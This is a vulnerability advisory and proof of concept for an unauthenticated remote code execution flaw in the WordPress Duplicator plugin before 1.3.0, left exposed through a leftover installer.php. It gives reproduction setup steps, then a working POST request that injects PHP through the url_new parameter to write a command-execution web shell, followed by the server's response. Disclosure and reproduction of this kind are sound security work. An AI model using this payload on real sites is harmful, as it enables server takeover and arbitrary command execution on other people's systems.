Duplicator < 1.3.0 – Unauthenticated RCE | CVE 2018-25095

Description

The plugin does not properly escape values when its installer script replaces values in WordPress configuration files. If this installer script is left on the site after use, it could be use to run arbitrary code on the server.

Proof of Concept

****Steps to Reproduce*****
***Setup***
Download WAMP with the following config:
- WAMP - v3.3.2
- Phpmyadmin - v4.9.11
- Apache - v2.4.58
- PHP - v5.6.40
- MySQL - v5.6.51
- MariaDB - v5.5.62
- Wordpress - v4.6

***Simulating admin forgetting to remove the installer.php files post-installation ***

1) Download Duplicator 1.1.6 from https://downloads.wordpress.org/plugin/duplicator.1.1.6.zip install plugin your wordpress site via the admin dashboard and activate it.

2) navigate to the 'duplicator' tab on the admin dashboard.

3) Click on 'create new' and follow the steps to generate a installer.php file.

4) Download the installer.php file and place it on your wordpress directory to simulate a administrator forgetting to remove the installer.php and/or installer-backup.php files post-installation.


****POC******
**Request**
POST /wordpress/installer.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 124
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close

action_ajax=2&action_step=2&url_new=TESTING');file_put_contents("Delvy.php",'<pre><?php system($_GET["cmd"]); ?></pre>'); /*

**Response**
HTTP/1.1 200 OK
Date: Fri, 08 Dec 2023 14:53:40 GMT
Server: Apache/2.4.58 (Win64) PHP/5.6.40 mod_fcgid/2.3.10-dev
X-Powered-By: PHP/5.6.40
Content-Length: 529
Connection: close
Content-Type: text/html; charset=UTF-8

 {"step1":null,"step2":{"scan_tables":0,"scan_rows":0,"scan_cells":0,"updt_tables":0,"updt_rows":0,"updt_cells":0,"errsql":[],"errser":[],"errkey":[],"errsql_sum":0,"errser_sum":0,"errkey_sum":0,"time":"0.0000 sec.","err_all":0,"warn_all":1,"warnlist":["WP-CONFIG WARNING: The wp-config.php has one or more of these values \"WP_CONTENT_DIR, WP_CONTENT_URL, WPCACHEHOME, COOKIE_DOMAIN, WP_SITEURL, WP_HOME, WP_TEMP_DIR\" which may cause issues please validate these values by opening the file."],"pass":1}}

***Important***
Do note that if the following POC is ran on an apache server it will DOS the web app!!!